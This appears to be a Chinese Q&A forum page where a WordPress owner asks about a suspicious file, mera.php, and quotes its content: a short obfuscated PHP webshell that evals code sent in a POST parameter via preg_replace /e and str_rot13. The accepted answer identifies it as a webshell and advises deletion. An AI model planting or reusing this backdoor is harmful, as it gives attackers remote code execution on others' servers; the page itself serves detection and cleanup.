doulao1966 2016-08-18 07:37
浏览 118
已采纳

WordPress网站被黑了? 可疑的PHP文件

I found a suspicious PHP file /wp-includes/mera.php

Content:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious?

  • 写回答

3条回答 默认 最新

  • duanbin3021 2016-08-18 08:52
    关注

    Delete the file instantly!

    This PHP code is a modified webshell. Those could be used to atack other websites and could lead to serious legal problems!

    After deletion you should also fix the leak that let the file in!

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

  • 如何保护您的 WordPress 不被
    2024-07-25 21:13
    明月登楼的博客 今天明月就给大家说说平时...如此养成上述的操作习惯,基本上你的 WordPress 就很难被,并且定期的对比一下 WordPress 核心目录和文件的完整性可以及时发现各种被的风险,这比你用什么安全应用扫描快捷有效多了。
  • 基于PHPWordPress主题自媒体博客网站源码.zip
    2023-08-29 23:35
    【标题】"基于PHPWordPress主题自媒体博客网站源码.zip" 提供的是一个使用PHP编程语言构建的WordPress主题,特别设计为暗风格,适用于自媒体博客网站WordPress是全球最受欢迎的内容管理系统(CMS),其...
  • wordpress网站后怎么解决
    2019-04-30 13:23
    老齐SEO的博客 wordpress网站本身的安全性还是非常高的,一般不会被轻易被的,但是这不是百分百的,它也是会被的,那么wordpress网站后怎么解决呢? 通过查看wordpress网站的日志发现,每天有大量的IP访问wordpress网站...
  • 基于PHP色自适应企业网站模板php版v1.0源码.zip
    2023-10-14 21:43
    在实际的压缩包中,我们通常会看到如HTML文件(用于页面结构)、CSS文件(用于样式设计)、JavaScript文件(用于前端交互)、PHP文件(用于后端逻辑)、图片和其他资源文件。此外,可能还包括数据库配置文件、文档...
  • plugin-darkmode:WordPress暗模式主题插件
    2021-03-30 08:28
    WordPress的生态系统中,开发和使用插件是增强网站功能和自定义外观的重要方式。"plugin-darkmode"是一个专门针对WordPress平台设计的暗模式主题插件。它允许用户轻松地在光明和暗主题之间切换,为用户提供更...
  • 4105色斜纹质感图片展示html5模板5601_企业网站模板PHP整站源码.zip.7z
    2023-08-01 17:33
    PHP整站源码通常包括以下部分:首页、关于我们、产品/服务、新闻/博客、联系我们等页面的PHP文件,以及数据库连接文件、配置文件、函数库等。这些文件共同构成了网站的核心结构,开发者可以根据实际需求进行定制和...
  • 4099色相间个性二栏html5博客模板5190_企业网站模板PHP整站源码.zip.7z
    2023-08-01 17:33
    在解压这个7z文件后,你会找到这个模板的各个组成部分,如HTML文件、CSS样式表、JavaScript脚本、图片资源,以及PHP文件等。这些文件需要上传至服务器,并配置好数据库连接,才能在实际网站环境中运行。 为了充分...
  • wordpress网站恶意攻击解决方法之 xmlrpc.php
    2019-10-09 12:56
    stwood007的博客 攻击原理 wordpress网站xmlrpc.php文件是一个远程端口文件,攻击者...解决wordpress网站xmlrpc.php文件被恶意攻击,最好的方法就是关闭掉自己网站xmlrpc.php文件。 方法如下: 第一步:在自己网站使用的wordpr...
  • 2025最新WordPress网站被挂码的原因与解决方案
    2025-04-02 11:30
    wodrpress资源分享的博客 本文将深入剖析WordPress网站被挂码的11个主要原因,并提供切实可行的解决方案,帮助您构建坚不可摧的网站防线。全球超过三分之一的网站运行在WordPress上,这种规模效应使客能够轻易找到安全防护薄弱的站点进行...
  • 基于PHP的白菜骗子QQ举报查询系统网站源码php版.zip
    2023-07-24 22:01
    "基于PHP的白菜骗子QQ举报查询系统网站源码php版.zip" 这个标题表明我们正在讨论一个使用PHP编程语言开发的网站源码,该系统主要用于处理QQ(中国流行的即时通讯软件)的骗子举报和查询功能。"白菜骗子"可能是指这个...
  • 没有解决我的问题, 去提问